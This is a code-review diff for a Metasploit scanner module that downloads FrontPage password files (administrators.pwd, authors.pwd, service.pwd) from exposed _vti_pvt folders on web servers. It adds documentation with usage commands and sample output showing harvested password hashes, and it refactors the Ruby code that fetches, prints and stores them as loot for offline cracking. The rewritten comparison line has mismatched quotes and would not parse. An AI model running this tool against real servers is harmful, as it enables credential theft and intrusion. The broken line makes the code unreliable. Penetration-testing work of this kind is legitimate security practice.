Added docs. Made suggested code changes.

modules/auxiliary/scanner/http/frontpage_credential_dump.md

@@ -0,0 +1,69 @@
+## Description
+When Microsoft FrontPage is run on a non-IIS web server it creates encrypted password files in the _vti_pvt folder. When this folder is accessible, these files can be downloaded and parsed to obtain encrytped passwords. These encrypted passwords can then be cracked offline and used to gain further access to the server.
+
+Affected Files:
+
+ * administrators.pwd
+ * authors.pwd
+ * service.pwd
+
+Citations:
+ * https://msdn.microsoft.com/en-us/library/cc750050.aspx
+ * http://sparty.secniche.org/
+
+## Usage
+```
+use auxiliary/scanner/http/frontpage_credential_dump
+set RHOSTS 10.10.10.10
+set TARGETURI about
+run
+```
+
+## Standard Output
+```
+msf auxiliary(scanner/http/frontpage_credential_dump) > run
+
+[+] 10.10.10.10 - service.pwd
+[+] # -FrontPage-
+[+] username:kLAsISPJ8AsaQ
+
+[+] 10.10.10.10 - administrators.pwd
+[+] # -FrontPage-
+[+] username:wMyvw3d3c1oWU
+
+[+] 10.10.10.10 - authors.pwd
+[+] # -FrontPage-
+[+] username:wMyvw3d3c1oWU
+
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+## Verbose Output
+```
+msf auxiliary(scanner/http/frontpage_credential_dump) > run
+
+[*] Requesting: /about/_vti_pvt/service.pwd
+[*] Found /about/_vti_pvt/service.pwd.
+[*] Found FrontPage credentials.
+[+] 10.10.10.10 - service.pwd
+[+] # -FrontPage-
+[+] username:kLAsISPJ8AsaQ
+
+[*] Requesting: /about/_vti_pvt/administrators.pwd
+[*] Found /about/_vti_pvt/administrators.pwd.
+[*] Found FrontPage credentials.
+[+] 10.10.10.10 - administrators.pwd
+[+] # -FrontPage-
+[+] username:wMyvw3d3c1oWU
+
+[*] Requesting: /about/_vti_pvt/authors.pwd
+[*] Found /about/_vti_pvt/authors.pwd.
+[*] Found FrontPage credentials.
+[+] 10.10.10.10 - authors.pwd
+[+] # -FrontPage-
+[+] username:wMyvw3d3c1oWU
+
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```

modules/auxiliary/scanner/http/frontpage_credential_dump.rb

@@ -21,8 +21,8 @@ class MetasploitModule < Msf::Auxiliary
         ],
       'Author'         =>
         [
-          'Aditya K Sood @adityaksood - Sparty tool',
+          'Aditya K Sood @adityaksood', # Sparty tool',
-          'averagesecurityguy - Metasploit module'
+          'Stephen Haywood @averagesecguy' # Metasploit module'
         ],
       'License'        => MSF_LICENSE,
     ))
@@ -42,20 +42,21 @@ class MetasploitModule < Msf::Auxiliary
       'method' => 'GET',
     })
 
-    if res.code == 200
+    unless res.code == 200
-      vprint_status("Found #{uri}.")
-      if res.body.lines.first.chomp == "# -FrontPage-"
-        vprint_status("Found FrontPage credentials.")
-        return res.body
-      else
-        vprint_status("Filed does not contain FrontPage credentials.")
-        vprint_status(res.body)
-        return nil
-      end
-    else
       vprint_status("File #{uri} not found.")
       return nil
     end
+
+    vprint_status("Found #{uri}.")
+
+    unless res.body.lines.first.chomp == '# -FrontPage-"
+      vprint_status("File does not contain FrontPage credentials.")
+      vprint_status(res.body)
+      return nil
+    end
+
+    vprint_status("Found FrontPage credentials.")
+    return res.body
   end
 
   def run_host(ip)
@@ -63,17 +64,18 @@ class MetasploitModule < Msf::Auxiliary
 
     files.each do |filename|
       contents = get_pass_file(filename)
-      if contents != nil
-        print_good("#{ip} - #{filename}")
 
-        contents.each_line do |line|
+      next if contents == nil
-          print_good(line.chomp)
-        end
 
-        print_line("")
+      print_good("#{ip} - #{filename}")
 
-        store_loot("frontpage.pwd.file", "text/plain", ip, contents, filename)
+      contents.each_line do |line|
+        print_good(line.chomp)
       end
+
+      print_line()
+
+      store_loot("frontpage.pwd.file", "text/plain", ip, contents, filename)
     end
   end
 end